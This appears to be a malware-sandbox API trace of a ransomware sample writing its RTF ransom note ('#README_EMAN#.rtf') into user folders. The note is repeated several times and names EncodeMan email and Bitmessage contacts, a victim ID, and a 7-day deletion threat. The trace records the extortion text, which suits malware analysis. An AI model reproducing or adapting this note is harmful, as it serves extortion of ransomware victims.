{{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0284.754] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0284.754] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x248aaf8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\n¯óÈgÑãHÐ\x09K¨?ìc¥àÛ©ü\x0c¥ñs\x01", lpUsedDefaultChar=0x0) returned 8717 [0284.754] WriteFile (in: hFile=0x228, lpBuffer=0x248aaf8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x248aaf8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0284.754] CloseHandle (hObject=0x228) returned 1 [0284.754] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_TW\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user 